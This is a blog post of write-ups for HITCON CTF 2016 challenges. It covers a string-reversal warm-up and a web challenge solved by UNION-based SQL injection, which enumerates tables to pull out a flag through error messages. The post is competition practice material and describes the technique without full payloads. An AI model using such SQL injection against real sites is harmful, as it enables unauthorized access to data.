|    |    |    | Today: 26-Jun-2017 |

HITCON CTF 2016 Write-ups

October 10, 2016 | Posted in How to

HITCON LOGO
HITCON CTF 2016 - Oct 8 10:00 AM ~ Oct 10 10:00 AM (GMT+8)



Welcome - Reverse (50)


Description
}FTC NOCTIH ot emocleW{noctih

Hint
None


quick answer :

\___ # python
>>> "}FTC NOCTIH ot emocleW{noctih"[::-1]
'hitcon{Welcome to HITCON CTF}'
>>>


hitcon{Welcome to HITCON CTF} is the flag




Are you rich? - Web (50)


Question: Are You Rich?
Open http://52.197.184.164/are_you_rich/ and navigate to verify.php

do some standard SQL Injection Testing (simple SELECT statement) for Address:
simple SELECT statement
An SQL injection attack consists of insertion or "injection" of either a partial or complete SQL query via the data input or transmitted from the client (browser) to the web application.
Table Name
Error!: Remote API server reject your invalid address 'COLUMNS'. If your address is valid, please PM @cebrusfs or other admin on IRC.

The UNION operator is used in SQL injections to join a query, purposely forged by the tester, to the original query. Change the limit to output a different table_name, and keep enumerating to find the table named flag.
table_name flag1
Error!: Remote API server reject your invalid address 'flag1'. If your address is valid, please PM @cebrusfs or other admin on IRC.

Let's get the flag !

Are You Rich? Buy the Flag - HITCON 2016
Error!: Remote API server reject your invalid address 'hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}'. If your address is valid, please PM @cebrusfs or other admin on IRC.

another way by nacayoshi00

Inject and Buy Flag1

That's it..




To be continued...


Taged in: Conference, hitcon, taiwan, write, writeups